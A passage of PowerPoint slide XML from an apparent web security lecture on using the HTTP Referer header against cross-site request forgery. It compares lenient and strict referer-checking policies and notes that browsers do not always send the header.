                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61728816-31F6-944A-840A-5BBFCC51CD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3287713"/>
            <a:ext cx="133350" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="254" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2F650FF-4CCE-CA45-960B-8E6DD5A00004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3748088"/>
            <a:ext cx="133350" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="254" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD09804-E9B1-0B4F-AB12-59B67A854A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4210050"/>
            <a:ext cx="133350" cy="246063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="254" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87048" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB474D5-A174-E54C-B66B-D64B732CFA18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1384300" y="3125788"/>
            <a:ext cx="340677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ct val="136000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.bank.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Referer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.attacker.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Referer:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84410CC9-DE60-764F-BA95-3AE2489E0663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="6145213"/>
            <a:ext cx="131762" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="254" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F9B42E-A85F-9B4D-8C5B-A2DDE6DFB759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="6108700"/>
            <a:ext cx="5605463" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Lenient </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Block </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bad, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>allow </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>missing</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6423525-F584-1C4A-9CCF-843C8A3D3EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="6818313"/>
            <a:ext cx="131762" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="254" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CA71EE8-D8F0-8049-AE40-21C3B26ECE05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="6781800"/>
            <a:ext cx="4081463" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Block </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>unless</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>good</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87053" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{114E83AB-B889-FD41-921A-F1ED71EE934F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5816600" y="3013075"/>
            <a:ext cx="4508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3400">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3925"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="63"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>✘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3925"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="DE6A10"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
                <a:ea typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3400">
              <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="77"/>
              <a:ea typeface="MS UI Gothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691BB0C2-C00D-0349-9FA8-A682D02DDE6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="5054600"/>
            <a:ext cx="9142413" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>REFERER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> are optional; not included by all browsers.</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87055" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7BFDD8D-F658-5C40-970A-837CF522C8E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="811213" y="1254125"/>
            <a:ext cx="8348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a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Referer request header contains the address of the previous web page  from which a link to the currently requested page was followed. The header  allows servers to identify where people are visiting from.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836B5B9-C4FD-AD46-A74D-3EBF6241732D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3713163" y="50800"/>
            <a:ext cx="2632075" cy="441325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9940" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr u="none" dirty="0"/>
              <a:t>I visit</a:t>
            </a:r>
            <a:r>
              <a:rPr u="none" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="39" dirty="0"/>
              <a:t>reddit.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA13990-F72F-E44B-91F5-660B44ECF913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358775" y="5049838"/>
            <a:ext cx="7624763" cy="27225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5963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="715963"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5963"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5963"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5963"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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF7B900-77A3-DF44-A1FA-583D10001EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357438" y="4605338"/>
            <a:ext cx="5346700" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9940" defTabSz="715606" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-47" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Later, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="74" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>go </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" u="heavy" spc="24" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reddit.com/r/security</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88069" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E1C496-3AFF-204A-AD55-14BA2F20C6BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="7296150"/>
            <a:ext cx="2752725" cy="2413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715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="715963">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
